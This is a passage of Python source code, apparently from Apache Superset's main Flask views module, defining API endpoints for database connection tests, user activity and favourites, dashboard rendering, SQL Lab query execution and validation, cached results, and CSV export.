# are represented as JSON encoded strings in the model.
database = Database(
server_cert=request.json.get("server_cert"),
extra=json.dumps(request.json.get("extra", {})),
impersonate_user=request.json.get("impersonate_user"),
encrypted_extra=json.dumps(request.json.get("encrypted_extra", {})),
)
database.set_sqlalchemy_uri(uri)
database.db_engine_spec.mutate_db_for_connection_test(database)
engine = database.get_sqla_engine()
with closing(engine.raw_connection()) as conn:
if engine.dialect.do_ping(conn):
return json_success('"OK"')
raise DBAPIError(None, None, None)
except CertificateException as ex:
logger.info("Certificate exception")
return json_error_response(ex.message)
except (NoSuchModuleError, ModuleNotFoundError):
logger.info("Invalid driver")
driver_name = make_url_safe(uri).drivername
return json_error_response(
_(
"Could not load database driver: %(driver_name)s",
driver_name=driver_name,
),
400,
)
except DatabaseInvalidError:
logger.info("Invalid URI")
return json_error_response(
_(
"Invalid connection string, a valid string usually follows:\n"
"'DRIVER://USER:PASSWORD@DB-HOST/DATABASE-NAME'"
)
)
except DBAPIError:
logger.warning("Connection failed")
return json_error_response(
_("Connection failed, please check your connection settings"), 400
)
except SupersetSecurityException as ex:
logger.warning("Stopped an unsafe database connection")
return json_error_response(_(str(ex)), 400)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Unexpected error %s", type(ex).__name__)
return json_error_response(
_("Unexpected error occurred, please check your logs for details"), 400
)
@staticmethod
def get_user_activity_access_error(user_id: int) -> Optional[FlaskResponse]:
try:
security_manager.raise_for_user_activity_access(user_id)
except SupersetSecurityException as ex:
return json_error_response(
ex.message,
status=403,
)
return None
@api
@has_access_api
@event_logger.log_this
@expose("/recent_activity/<int:user_id>/", methods=["GET"])
def recent_activity( # pylint: disable=too-many-locals
self, user_id: int
) -> FlaskResponse:
"""Recent activity (actions) for a given user"""
error_obj = self.get_user_activity_access_error(user_id)
if error_obj:
return error_obj
limit = request.args.get("limit")
limit = int(limit) if limit and limit.isdigit() else 100
actions = request.args.get("actions", "explore,dashboard").split(",")
# whether to get distinct subjects
distinct = request.args.get("distinct") != "false"
has_subject_title = or_(
and_(
Dashboard.dashboard_title is not None,
Dashboard.dashboard_title != "",
),
and_(Slice.slice_name is not None, Slice.slice_name != ""),
)
if distinct:
one_year_ago = datetime.today() - timedelta(days=365)
subqry = (
db.session.query(
Log.dashboard_id,
Log.slice_id,
Log.action,
func.max(Log.dttm).label("dttm"),
)
.group_by(Log.dashboard_id, Log.slice_id, Log.action)
.filter(
and_(
Log.action.in_(actions),
Log.user_id == user_id,
# limit to one year of data to improve performance
Log.dttm > one_year_ago,
or_(Log.dashboard_id.isnot(None), Log.slice_id.isnot(None)),
)
)
.subquery()
)
qry = (
db.session.query(
subqry,
Dashboard.slug.label("dashboard_slug"),
Dashboard.dashboard_title,
Slice.slice_name,
)
.outerjoin(Dashboard, Dashboard.id == subqry.c.dashboard_id)
.outerjoin(
Slice,
Slice.id == subqry.c.slice_id,
)
.filter(has_subject_title)
.order_by(subqry.c.dttm.desc())
.limit(limit)
)
else:
qry = (
db.session.query(
Log.dttm,
Log.action,
Log.dashboard_id,
Log.slice_id,
Dashboard.slug.label("dashboard_slug"),
Dashboard.dashboard_title,
Slice.slice_name,
)
.outerjoin(Dashboard, Dashboard.id == Log.dashboard_id)
.outerjoin(Slice, Slice.id == Log.slice_id)
.filter(has_subject_title)
.order_by(Log.dttm.desc())
.limit(limit)
)
payload = []
for log in qry.all():
item_url = None
item_title = None
item_type = None
if log.dashboard_id:
item_type = "dashboard"
item_url = Dashboard(id=log.dashboard_id, slug=log.dashboard_slug).url
item_title = log.dashboard_title
elif log.slice_id:
slc = Slice(id=log.slice_id, slice_name=log.slice_name)
item_type = "slice"
item_url = slc.slice_url
item_title = slc.chart
payload.append(
{
"action": log.action,
"item_type": item_type,
"item_url": item_url,
"item_title": item_title,
"time": log.dttm,
"time_delta_humanized": humanize.naturaltime(
datetime.now() - log.dttm
),
}
)
return json_success(json.dumps(payload, default=utils.json_int_dttm_ser))
@api
@has_access_api
@event_logger.log_this
@expose("/available_domains/", methods=["GET"])
def available_domains(self) -> FlaskResponse: # pylint: disable=no-self-use
"""
Returns the list of available Superset Webserver domains (if any)
defined in config. This enables charts embedded in other apps to
leverage domain sharding if appropriately configured.
"""
return Response(
json.dumps(conf.get("SUPERSET_WEBSERVER_DOMAINS")), mimetype="text/json"
)
@api
@has_access_api
@event_logger.log_this
@expose("/fave_dashboards_by_username/<username>/", methods=["GET"])
def fave_dashboards_by_username(self, username: str) -> FlaskResponse:
"""This lets us use a user's username to pull favourite dashboards"""
logger.warning(
"%s.fave_dashboards_by_username "
"This API endpoint is deprecated and will be removed in version 3.0.0",
self.__class__.__name__,
)
user = security_manager.find_user(username=username)
return self.fave_dashboards(user.id)
@api
@has_access_api
@event_logger.log_this
@expose("/fave_dashboards/<int:user_id>/", methods=["GET"])
def fave_dashboards(self, user_id: int) -> FlaskResponse:
logger.warning(
"%s.fave_dashboards "
"This API endpoint is deprecated and will be removed in version 3.0.0",
self.__class__.__name__,
)
error_obj = self.get_user_activity_access_error(user_id)
if error_obj:
return error_obj
qry = (
db.session.query(Dashboard, FavStar.dttm)
.join(
FavStar,
and_(
FavStar.user_id == int(user_id),
FavStar.class_name == "Dashboard",
Dashboard.id == FavStar.obj_id,
),
)
.order_by(FavStar.dttm.desc())
)
payload = []
for o in qry.all():
dash = {
"id": o.Dashboard.id,
"dashboard": o.Dashboard.dashboard_link(),
"title": o.Dashboard.dashboard_title,
"url": o.Dashboard.url,
"dttm": o.dttm,
}
if o.Dashboard.created_by:
user = o.Dashboard.created_by
dash["creator"] = str(user)
dash["creator_url"] = "/superset/profile/{}/".format(user.username)
payload.append(dash)
return json_success(json.dumps(payload, default=utils.json_int_dttm_ser))
@api
@has_access_api
@event_logger.log_this
@expose("/created_dashboards/<int:user_id>/", methods=["GET"])
def created_dashboards(self, user_id: int) -> FlaskResponse:
logger.warning(
"%s.created_dashboards "
"This API endpoint is deprecated and will be removed in version 3.0.0",
self.__class__.__name__,
)
error_obj = self.get_user_activity_access_error(user_id)
if error_obj:
return error_obj
qry = (
db.session.query(Dashboard)
.filter( # pylint: disable=comparison-with-callable
or_(
Dashboard.created_by_fk == user_id,
Dashboard.changed_by_fk == user_id,
)
)
.order_by(Dashboard.changed_on.desc())
)
payload = [
{
"id": o.id,
"dashboard": o.dashboard_link(),
"title": o.dashboard_title,
"url": o.url,
"dttm": o.changed_on,
}
for o in qry.all()
]
return json_success(json.dumps(payload, default=utils.json_int_dttm_ser))
@api
@has_access_api
@event_logger.log_this
@expose("/user_slices", methods=["GET"])
@expose("/user_slices/<int:user_id>/", methods=["GET"])
def user_slices(self, user_id: Optional[int] = None) -> FlaskResponse:
"""List of slices a user owns, created, modified or faved"""
if not user_id:
user_id = cast(int, g.user.id)
error_obj = self.get_user_activity_access_error(user_id)
if error_obj:
return error_obj
owner_ids_query = (
db.session.query(Slice.id)
.join(Slice.owners)
.filter(security_manager.user_model.id == user_id)
)
qry = (
db.session.query(Slice, FavStar.dttm)
.join(
FavStar,
and_(
FavStar.user_id == user_id,
FavStar.class_name == "slice",
Slice.id == FavStar.obj_id,
),
isouter=True,
)
.filter( # pylint: disable=comparison-with-callable
or_(
Slice.id.in_(owner_ids_query),
Slice.created_by_fk == user_id,
Slice.changed_by_fk == user_id,
FavStar.user_id == user_id,
)
)
.order_by(Slice.slice_name.asc())
)
payload = [
{
"id": o.Slice.id,
"title": o.Slice.slice_name,
"url": o.Slice.slice_url,
"data": o.Slice.form_data,
"dttm": o.dttm if o.dttm else o.Slice.changed_on,
"viz_type": o.Slice.viz_type,
}
for o in qry.all()
]
return json_success(json.dumps(payload, default=utils.json_int_dttm_ser))
@api
@has_access_api
@event_logger.log_this
@expose("/created_slices", methods=["GET"])
@expose("/created_slices/<int:user_id>/", methods=["GET"])
def created_slices(self, user_id: Optional[int] = None) -> FlaskResponse:
"""List of slices created by this user"""
if not user_id:
user_id = cast(int, g.user.id)
error_obj = self.get_user_activity_access_error(user_id)
if error_obj:
return error_obj
qry = (
db.session.query(Slice)
.filter( # pylint: disable=comparison-with-callable
or_(Slice.created_by_fk == user_id, Slice.changed_by_fk == user_id)
)
.order_by(Slice.changed_on.desc())
)
payload = [
{
"id": o.id,
"title": o.slice_name,
"url": o.slice_url,
"dttm": o.changed_on,
"viz_type": o.viz_type,
}
for o in qry.all()
]
return json_success(json.dumps(payload, default=utils.json_int_dttm_ser))
@api
@has_access_api
@event_logger.log_this
@expose("/fave_slices", methods=["GET"])
@expose("/fave_slices/<int:user_id>/", methods=["GET"])
def fave_slices(self, user_id: Optional[int] = None) -> FlaskResponse:
"""Favorite slices for a user"""
if user_id is None:
user_id = g.user.id
error_obj = self.get_user_activity_access_error(user_id)
if error_obj:
return error_obj
qry = (
db.session.query(Slice, FavStar.dttm)
.join(
FavStar,
and_(
FavStar.user_id == user_id,
FavStar.class_name == "slice",
Slice.id == FavStar.obj_id,
),
)
.order_by(FavStar.dttm.desc())
)
payload = []
for o in qry.all():
dash = {
"id": o.Slice.id,
"title": o.Slice.slice_name,
"url": o.Slice.slice_url,
"dttm": o.dttm,
"viz_type": o.Slice.viz_type,
}
if o.Slice.created_by:
user = o.Slice.created_by
dash["creator"] = str(user)
dash["creator_url"] = "/superset/profile/{}/".format(user.username)
payload.append(dash)
return json_success(json.dumps(payload, default=utils.json_int_dttm_ser))
@event_logger.log_this
@api
@has_access_api
@expose("/warm_up_cache/", methods=["GET"])
def warm_up_cache( # pylint: disable=too-many-locals,no-self-use
self,
) -> FlaskResponse:
"""Warms up the cache for the slice or table.
Note for slices a force refresh occurs.
In terms of the `extra_filters` these can be obtained from records in the JSON
encoded `logs.json` column associated with the `explore_json` action.
"""
session = db.session()
slice_id = request.args.get("slice_id")
dashboard_id = request.args.get("dashboard_id")
table_name = request.args.get("table_name")
db_name = request.args.get("db_name")
extra_filters = request.args.get("extra_filters")
slices: List[Slice] = []
if not slice_id and not (table_name and db_name):
return json_error_response(
__(
"Malformed request. slice_id or table_name and db_name "
"arguments are expected"
),
status=400,
)
if slice_id:
slices = session.query(Slice).filter_by(id=slice_id).all()
if not slices:
return json_error_response(
__("Chart %(id)s not found", id=slice_id), status=404
)
elif table_name and db_name:
table = (
session.query(SqlaTable)
.join(Database)
.filter(
Database.database_name == db_name
or SqlaTable.table_name == table_name
)
).one_or_none()
if not table:
return json_error_response(
__(
"Table %(table)s wasn't found in the database %(db)s",
table=table_name,
db=db_name,
),
status=404,
)
slices = (
session.query(Slice)
.filter_by(datasource_id=table.id, datasource_type=table.type)
.all()
)
result = []
for slc in slices:
try:
form_data = get_form_data(slc.id, use_slice_data=True)[0]
if dashboard_id:
form_data["extra_filters"] = (
json.loads(extra_filters)
if extra_filters
else get_dashboard_extra_filters(slc.id, dashboard_id)
)
if not slc.datasource:
raise Exception("Slice's datasource does not exist")
obj = get_viz(
datasource_type=slc.datasource.type,
datasource_id=slc.datasource.id,
form_data=form_data,
force=True,
)
# pylint: disable=assigning-non-slot
g.form_data = form_data
payload = obj.get_payload()
delattr(g, "form_data")
error = payload["errors"] or None
status = payload["status"]
except Exception as ex: # pylint: disable=broad-except
error = utils.error_msg_from_exception(ex)
status = None
result.append(
{"slice_id": slc.id, "viz_error": error, "viz_status": status}
)
return json_success(json.dumps(result))
@has_access_api
@event_logger.log_this
@expose("/favstar/<class_name>/<int:obj_id>/<action>/")
def favstar( # pylint: disable=no-self-use
self, class_name: str, obj_id: int, action: str
) -> FlaskResponse:
"""Toggle favorite stars on Slices and Dashboard"""
if not g.user.get_id():
return json_error_response("ERROR: Favstar toggling denied", status=403)
session = db.session()
count = 0
favs = (
session.query(FavStar)
.filter_by(class_name=class_name, obj_id=obj_id, user_id=g.user.get_id())
.all()
)
if action == "select":
if not favs:
session.add(
FavStar(
class_name=class_name,
obj_id=obj_id,
user_id=g.user.get_id(),
dttm=datetime.now(),
)
)
count = 1
elif action == "unselect":
for fav in favs:
session.delete(fav)
else:
count = len(favs)
session.commit()
return json_success(json.dumps({"count": count}))
@has_access
@expose("/dashboard/<dashboard_id_or_slug>/")
@event_logger.log_this_with_extra_payload
@check_dashboard_access(
on_error=lambda self, ex: Response(
utils.error_msg_from_exception(ex), status=403
)
)
def dashboard(
self,
dashboard_id_or_slug: str, # pylint: disable=unused-argument
add_extra_log_payload: Callable[..., None] = lambda **kwargs: None,
dashboard: Optional[Dashboard] = None,
) -> FlaskResponse:
"""
Server side rendering for a dashboard
:param dashboard_id_or_slug: identifier for dashboard. used in the decorators
:param add_extra_log_payload: added by `log_this_with_manual_updates`, set a
default value to appease pylint
:param dashboard: added by `check_dashboard_access`
"""
if not dashboard:
abort(404)
if config["ENABLE_ACCESS_REQUEST"]:
for datasource in dashboard.datasources:
datasource = DatasourceDAO.get_datasource(
datasource_type=DatasourceType(datasource.type),
datasource_id=datasource.id,
session=db.session(),
)
if datasource and not security_manager.can_access_datasource(
datasource=datasource
):
flash(
__(
security_manager.get_datasource_access_error_msg(datasource)
),
"danger",
)
return redirect(
f"/superset/request_access/?dashboard_id={dashboard.id}"
)
dash_edit_perm = check_ownership(
dashboard, raise_if_false=False
) and security_manager.can_access("can_save_dash", "Superset")
edit_mode = (
request.args.get(utils.ReservedUrlParameters.EDIT_MODE.value) == "true"
)
standalone_mode = ReservedUrlParameters.is_standalone_mode()
add_extra_log_payload(
dashboard_id=dashboard.id,
dashboard_version="v2",
dash_edit_perm=dash_edit_perm,
edit_mode=edit_mode,
)
bootstrap_data = {
"user": bootstrap_user_data(g.user, include_perms=True),
"common": common_bootstrap_payload(),
}
return self.render_template(
"superset/spa.html",
entry="spa",
bootstrap_data=json.dumps(
bootstrap_data, default=utils.pessimistic_json_iso_dttm_ser
),
standalone_mode=standalone_mode,
)
@has_access
@expose("/dashboard/p/<key>/", methods=["GET"])
def dashboard_permalink( # pylint: disable=no-self-use
self,
key: str,
) -> FlaskResponse:
try:
value = GetDashboardPermalinkCommand(g.user, key).run()
except DashboardPermalinkGetFailedError as ex:
flash(__("Error: %(msg)s", msg=ex.message), "danger")
return redirect("/dashboard/list/")
if not value:
return json_error_response(_("permalink state not found"), status=404)
dashboard_id = value["dashboardId"]
url = f"/superset/dashboard/{dashboard_id}?permalink_key={key}"
url_params = value["state"].get("urlParams")
if url_params:
params = parse.urlencode(url_params)
url = f"{url}&{params}"
hash_ = value["state"].get("hash")
if hash_:
url = f"{url}#{hash_}"
return redirect(url)
@api
@has_access
@event_logger.log_this
@expose("/log/", methods=["POST"])
def log(self) -> FlaskResponse: # pylint: disable=no-self-use
return Response(status=200)
@has_access
@expose("/get_or_create_table/", methods=["POST"])
@event_logger.log_this
def sqllab_table_viz(self) -> FlaskResponse: # pylint: disable=no-self-use
"""Gets or creates a table object with attributes passed to the API.
It expects the json with params:
* datasourceName - e.g. table name, required
* dbId - database id, required
* schema - table schema, optional
* templateParams - params for the Jinja templating syntax, optional
:return: Response
"""
data = json.loads(request.form["data"])
table_name = data["datasourceName"]
database_id = data["dbId"]
table = (
db.session.query(SqlaTable)
.filter_by(database_id=database_id, table_name=table_name)
.one_or_none()
)
if not table:
# Create table if doesn't exist.
with db.session.no_autoflush:
table = SqlaTable(table_name=table_name, owners=[g.user])
table.database_id = database_id
table.database = (
db.session.query(Database).filter_by(id=database_id).one()
)
table.schema = data.get("schema")
table.template_params = data.get("templateParams")
# needed for the table validation.
validate_sqlatable(table)
db.session.add(table)
table.fetch_metadata()
create_table_permissions(table)
db.session.commit()
return json_success(json.dumps({"table_id": table.id}))
@has_access
@expose("/sqllab_viz/", methods=["POST"])
@event_logger.log_this
def sqllab_viz(self) -> FlaskResponse: # pylint: disable=no-self-use
data = json.loads(request.form["data"])
try:
table_name = data["datasourceName"]
database_id = data["dbId"]
except KeyError as ex:
raise SupersetGenericErrorException(
__(
"One or more required fields are missing in the request. Please try "
"again, and if the problem persists conctact your administrator."
),
status=400,
) from ex
database = db.session.query(Database).get(database_id)
if not database:
raise SupersetErrorException(
SupersetError(
message=__("The database was not found."),
error_type=SupersetErrorType.DATABASE_NOT_FOUND_ERROR,
level=ErrorLevel.ERROR,
),
status=404,
)
table = (
db.session.query(SqlaTable)
.filter_by(database_id=database_id, table_name=table_name)
.one_or_none()
)
if not table:
table = SqlaTable(table_name=table_name, owners=[g.user])
table.database = database
table.schema = data.get("schema")
table.template_params = data.get("templateParams")
table.is_sqllab_view = True
table.sql = ParsedQuery(data.get("sql")).stripped()
db.session.add(table)
cols = []
for config_ in data.get("columns"):
column_name = config_.get("name")
col = TableColumn(
column_name=column_name,
filterable=True,
groupby=True,
is_dttm=config_.get("is_dttm", False),
type=config_.get("type", False),
)
cols.append(col)
table.columns = cols
table.metrics = [SqlMetric(metric_name="count", expression="count(*)")]
db.session.commit()
return json_success(json.dumps({"table_id": table.id}))
@has_access
@expose("/extra_table_metadata/<int:database_id>/<table_name>/<schema>/")
@event_logger.log_this
def extra_table_metadata(
self, database_id: int, table_name: str, schema: str
) -> FlaskResponse:
logger.warning(
"%s.extra_table_metadata "
"This API endpoint is deprecated and will be removed in version 3.0.0",
self.__class__.__name__,
)
parsed_schema = utils.parse_js_uri_path_item(schema, eval_undefined=True)
table_name = utils.parse_js_uri_path_item(table_name) # type: ignore
mydb = db.session.query(Database).filter_by(id=database_id).one()
payload = mydb.db_engine_spec.extra_table_metadata(
mydb, table_name, parsed_schema
)
return json_success(json.dumps(payload))
@has_access_api
@expose("/estimate_query_cost/<int:database_id>/", methods=["POST"])
@expose("/estimate_query_cost/<int:database_id>/<schema>/", methods=["POST"])
@event_logger.log_this
def estimate_query_cost( # pylint: disable=no-self-use
self, database_id: int, schema: Optional[str] = None
) -> FlaskResponse:
mydb = db.session.query(Database).get(database_id)
sql = json.loads(request.form.get("sql", '""'))
template_params = json.loads(request.form.get("templateParams") or "{}")
if template_params:
template_processor = get_template_processor(mydb)
sql = template_processor.process_template(sql, **template_params)
timeout = SQLLAB_QUERY_COST_ESTIMATE_TIMEOUT
timeout_msg = f"The estimation exceeded the {timeout} seconds timeout."
try:
with utils.timeout(seconds=timeout, error_message=timeout_msg):
cost = mydb.db_engine_spec.estimate_query_cost(
mydb, schema, sql, utils.QuerySource.SQL_LAB
)
except SupersetTimeoutException as ex:
logger.exception(ex)
return json_errors_response([ex.error])
except Exception as ex: # pylint: disable=broad-except
return json_error_response(utils.error_msg_from_exception(ex))
spec = mydb.db_engine_spec
query_cost_formatters: Dict[str, Any] = app.config[
"QUERY_COST_FORMATTERS_BY_ENGINE"
]
query_cost_formatter = query_cost_formatters.get(
spec.engine, spec.query_cost_formatter
)
cost = query_cost_formatter(cost)
return json_success(json.dumps(cost))
@expose("/theme/")
def theme(self) -> FlaskResponse:
return self.render_template("superset/theme.html")
@has_access_api
@expose("/results/<key>/")
@event_logger.log_this
def results(self, key: str) -> FlaskResponse:
return self.results_exec(key)
@staticmethod
def results_exec(key: str) -> FlaskResponse:
"""Serves a key off of the results backend
It is possible to pass the `rows` query argument to limit the number
of rows returned.
"""
if not results_backend:
raise SupersetErrorException(
SupersetError(
message=__("Results backend is not configured."),
error_type=SupersetErrorType.RESULTS_BACKEND_NOT_CONFIGURED_ERROR,
level=ErrorLevel.ERROR,
)
)
read_from_results_backend_start = now_as_float()
blob = results_backend.get(key)
stats_logger.timing(
"sqllab.query.results_backend_read",
now_as_float() - read_from_results_backend_start,
)
if not blob:
raise SupersetErrorException(
SupersetError(
message=__(
"Data could not be retrieved from the results backend. You "
"need to re-run the original query."
),
error_type=SupersetErrorType.RESULTS_BACKEND_ERROR,
level=ErrorLevel.ERROR,
),
status=410,
)
query = db.session.query(Query).filter_by(results_key=key).one_or_none()
if query is None:
raise SupersetErrorException(
SupersetError(
message=__(
"The query associated with these results could not be find. "
"You need to re-run the original query."
),
error_type=SupersetErrorType.RESULTS_BACKEND_ERROR,
level=ErrorLevel.ERROR,
),
status=404,
)
try:
query.raise_for_access()
except SupersetSecurityException as ex:
raise SupersetErrorException(
SupersetError(
message=__(
"You are not authorized to see this query. If you think this "
"is an error, please reach out to your administrator."
),
error_type=SupersetErrorType.QUERY_SECURITY_ACCESS_ERROR,
level=ErrorLevel.ERROR,
),
status=403,
) from ex
payload = utils.zlib_decompress(blob, decode=not results_backend_use_msgpack)
try:
obj = _deserialize_results_payload(
payload, query, cast(bool, results_backend_use_msgpack)
)
except SerializationError as ex:
raise SupersetErrorException(
SupersetError(
message=__(
"Data could not be deserialized from the results backend. The "
"storage format might have changed, rendering the old data "
"stake. You need to re-run the original query."
),
error_type=SupersetErrorType.RESULTS_BACKEND_ERROR,
level=ErrorLevel.ERROR,
),
status=404,
) from ex
if "rows" in request.args:
try:
rows = int(request.args["rows"])
except ValueError as ex:
raise SupersetErrorException(
SupersetError(
message=__(
"The provided `rows` argument is not a valid integer."
),
error_type=SupersetErrorType.INVALID_PAYLOAD_SCHEMA_ERROR,
level=ErrorLevel.ERROR,
),
status=400,
) from ex
obj = apply_display_max_row_configuration_if_require(obj, rows)
return json_success(
json.dumps(
obj, default=utils.json_iso_dttm_ser, ignore_nan=True, encoding=None
)
)
@has_access_api
@handle_api_exception
@expose("/stop_query/", methods=["POST"])
@event_logger.log_this
@backoff.on_exception(
backoff.constant,
Exception,
interval=1,
on_backoff=lambda details: db.session.rollback(),
on_giveup=lambda details: db.session.rollback(),
max_tries=5,
)
def stop_query(self) -> FlaskResponse:
client_id = request.form.get("client_id")
query = db.session.query(Query).filter_by(client_id=client_id).one()
if query.status in [
QueryStatus.FAILED,
QueryStatus.SUCCESS,
QueryStatus.TIMED_OUT,
]:
logger.warning(
"Query with client_id could not be stopped: query already complete",
)
return self.json_response("OK")
if not sql_lab.cancel_query(query):
raise SupersetCancelQueryException("Could not cancel query")
query.status = QueryStatus.STOPPED
db.session.commit()
return self.json_response("OK")
@has_access_api
@event_logger.log_this
@expose("/validate_sql_json/", methods=["POST", "GET"])
def validate_sql_json(
# pylint: disable=too-many-locals
self,
) -> FlaskResponse:
"""Validates that arbitrary sql is acceptable for the given database.
Returns a list of error/warning annotations as json.
"""
logger.warning(
"%s.validate_sql_json "
"This API endpoint is deprecated and will be removed in version 3.0.0",
self.__class__.__name__,
)
sql = request.form["sql"]
database_id = request.form["database_id"]
schema = request.form.get("schema") or None
template_params = json.loads(request.form.get("templateParams") or "{}")
if template_params is not None and len(template_params) > 0:
# TODO: factor the Database object out of template rendering
# or provide it as mydb so we can render template params
# without having to also persist a Query ORM object.
return json_error_response(
"SQL validation does not support template parameters", status=400
)
session = db.session()
mydb = session.query(Database).filter_by(id=database_id).one_or_none()
if not mydb:
return json_error_response(
"Database with id {} is missing.".format(database_id), status=400
)
spec = mydb.db_engine_spec
validators_by_engine = app.config["SQL_VALIDATORS_BY_ENGINE"]
if not validators_by_engine or spec.engine not in validators_by_engine:
return json_error_response(
"no SQL validator is configured for {}".format(spec.engine), status=400
)
validator_name = validators_by_engine[spec.engine]
validator = get_validator_by_name(validator_name)
if not validator:
return json_error_response(
"No validator named {} found (configured for the {} engine)".format(
validator_name, spec.engine
)
)
try:
timeout = config["SQLLAB_VALIDATION_TIMEOUT"]
timeout_msg = f"The query exceeded the {timeout} seconds timeout."
with utils.timeout(seconds=timeout, error_message=timeout_msg):
errors = validator.validate(sql, schema, mydb)
payload = json.dumps(
[err.to_dict() for err in errors],
default=utils.pessimistic_json_iso_dttm_ser,
ignore_nan=True,
encoding=None,
)
return json_success(payload)
except Exception as ex: # pylint: disable=broad-except
logger.exception(ex)
msg = _(
"%(validator)s was unable to check your query.\n"
"Please recheck your query.\n"
"Exception: %(ex)s",
validator=validator.name,
ex=ex,
)
# Return as a 400 if the database error message says we got a 4xx error
if re.search(r"([\W]|^)4\d{2}([\W]|$)", str(ex)):
return json_error_response(f"{msg}", status=400)
return json_error_response(f"{msg}")
@has_access_api
@handle_api_exception
@event_logger.log_this
@expose("/sql_json/", methods=["POST"])
def sql_json(self) -> FlaskResponse:
try:
log_params = {
"user_agent": cast(Optional[str], request.headers.get("USER_AGENT"))
}
execution_context = SqlJsonExecutionContext(request.json)
command = self._create_sql_json_command(execution_context, log_params)
command_result: CommandResult = command.run()
return self._create_response_from_execution_context(command_result)
except SqlLabException as ex:
logger.error(ex.message)
self._set_http_status_into_Sql_lab_exception(ex)
payload = {"errors": [ex.to_dict()]}
return json_error_response(status=ex.status, payload=payload)
@staticmethod
def _create_sql_json_command(
execution_context: SqlJsonExecutionContext, log_params: Optional[Dict[str, Any]]
) -> ExecuteSqlCommand:
query_dao = QueryDAO()
sql_json_executor = Superset._create_sql_json_executor(
execution_context, query_dao
)
execution_context_convertor = ExecutionContextConvertor()
execution_context_convertor.set_max_row_in_display(
int(config.get("DISPLAY_MAX_ROW")) # type: ignore
)
return ExecuteSqlCommand(
execution_context,
query_dao,
DatabaseDAO(),
CanAccessQueryValidatorImpl(),
SqlQueryRenderImpl(get_template_processor),
sql_json_executor,
execution_context_convertor,
config.get("SQLLAB_CTAS_NO_LIMIT"), # type: ignore
log_params,
)
@staticmethod
def _create_sql_json_executor(
execution_context: SqlJsonExecutionContext, query_dao: QueryDAO
) -> SqlJsonExecutor:
sql_json_executor: SqlJsonExecutor
if execution_context.is_run_asynchronous():
sql_json_executor = ASynchronousSqlJsonExecutor(query_dao, get_sql_results)
else:
sql_json_executor = SynchronousSqlJsonExecutor(
query_dao,
get_sql_results,
config.get("SQLLAB_TIMEOUT"), # type: ignore
is_feature_enabled("SQLLAB_BACKEND_PERSISTENCE"),
)
return sql_json_executor
@staticmethod
def _set_http_status_into_Sql_lab_exception(ex: SqlLabException) -> None:
if isinstance(ex, QueryIsForbiddenToAccessException):
ex.status = 403
def _create_response_from_execution_context( # pylint: disable=invalid-name, no-self-use
self,
command_result: CommandResult,
) -> FlaskResponse:
status_code = 200
if command_result["status"] == SqlJsonExecutionStatus.QUERY_IS_RUNNING:
status_code = 202
return json_success(command_result["payload"], status_code)
@has_access
@event_logger.log_this
@expose("/csv/<client_id>")
def csv( # pylint: disable=no-self-use,too-many-locals
self, client_id: str
) -> FlaskResponse:
"""Download the query results as csv."""
logger.info("Exporting CSV file [%s]", client_id)
query = db.session.query(Query).filter_by(client_id=client_id).one()
try:
query.raise_for_access()
except SupersetSecurityException as ex:
flash(ex.error.message)
return redirect("/")
blob = None
if results_backend and query.results_key:
logger.info("Fetching CSV from results backend [%s]", query.results_key)
blob = results_backend.get(query.results_key)
if blob:
logger.info("Decompressing")
payload = utils.zlib_decompress(
blob, decode=not results_backend_use_msgpack
)
obj = _deserialize_results_payload(
payload, query, cast(bool, results_backend_use_msgpack)
)
columns = [c["name"] for c in obj["columns"]]
df = pd.DataFrame.from_records(obj["data"], columns=columns)
logger.info("Using pandas to convert to CSV")
else:
logger.info("Running a query to turn into CSV")
if query.select_sql:
sql = query.select_sql
limit = None
else:
sql = query.executed_sql
limit = ParsedQuery(sql).limit
if limit is not None and query.limiting_factor in {
LimitingFactor.QUERY,
LimitingFactor.DROPDOWN,
LimitingFactor.QUERY_AND_DROPDOWN,
}:
# remove extra row from `increased_limit`
limit -= 1
df = query.database.get_df(sql, query.schema)[:limit]
csv_data = csv.df_to_escaped_csv(df, index=False, **config["CSV_EXPORT"])
quoted_csv_name = parse.quote(query.name)
response = CsvResponse(
csv_data, headers=generate_download_headers("csv", quoted_csv_name)
)
event_info = {
"event_type": "data_export",
"client_id": client_id,
"row_count": len(df.index),
"database": query.database.name,
"schema": query.schema,
"sql": query.sql,
"exported_format": "csv",
}
event_rep = repr(event_info)
logger.debug(
"CSV exported: %s", event_rep, extra={"superset_event": event_info}
)
return response
@api
@handle_api_exception
@has_access
@event_logger.log_this
@expose("/fetch_datasource_metadata")
def fetch_datasource_metadata(self) -> FlaskResponse: # pylint: disable=no-self-use
"""
Fetch the datasource metadata.
:returns: The Flask response
:raises SupersetSecurityException: If the user cannot access the resource
"""
datasource_id, datasource_type = request.args["datasourceKey"].split("__")
datasource = DatasourceDAO.get_datasource(
db.session, DatasourceType(datasource_type), int(datasource_id)
)
# Check if datasource exists
if not datasource:
return json_error_response(DATASOURCE_MISSING_ERR)
datasource.raise_for_access()
return json_success(json.dumps(sanitize_datasource_data(datasource.data)))
@has_access_api
@event_logger.log_this
@expose("/queries/<float:last_updated_ms>")
@expose("/queries/<int:last_updated_ms>")
def queries(self, last_updated_ms: Union[float, int]) -> FlaskResponse:
"""
Get the updated queries.
:param last_updated_ms: Unix time (milliseconds)
"""
return self.queries_exec(last_updated_ms)
@staticmethod
def queries_exec(last_updated_ms: Union[float, int]) -> FlaskResponse:
stats_logger.incr("queries")
if not g.user.get_id():
return json_error_response(
"Please login to access the queries.", status=403
)
# UTC date time, same that is stored in the DB.
last_updated_dt = datetime.utcfromtimestamp(last_updated_ms / 1000)
sql_queries = (
db.session.query(Query)
.filter(
Query.user_id == g.user.get_id(), Query.changed_on >= last_updated_dt
)
.all()
)
dict_queries = {q.client_id: q.to_dict() for q in sql_queries}
return json_success(json.dumps(dict_queries, default=utils.json_int_dttm_ser))
@has_access
@event_logger.log_this
@expose("/search_queries")
def search_queries(self) -> FlaskResponse: # pylint: disable=no-self-use
"""
Search for previously run sqllab queries. Used for Sqllab Query Search
page /superset/sqllab#search.
Custom permission can_only_search_queries_owned restricts queries
to only queries run by current user.
:returns: Response with list of sql query dicts
"""
if security_manager.can_access_all_queries():
search_user_id = request.args.get("user_id")
elif request.args.get("user_id") is not None:
try:
search_user_id = int(cast(int, request.args.get("user_id")))
except ValueError:
return Response(status=400, mimetype="application/json")
if search_user_id != g.user.get_user_id():
return Response(status=403, mimetype="application/json")
else:
search_user_id = g.user.get_user_id()
database_id = request.args.get("database_id")
search_text = request.args.get("search_text")
status = request.args.get("status")
# From and To time stamp should be Epoch timestamp in seconds
from_time = request.args.get("from")
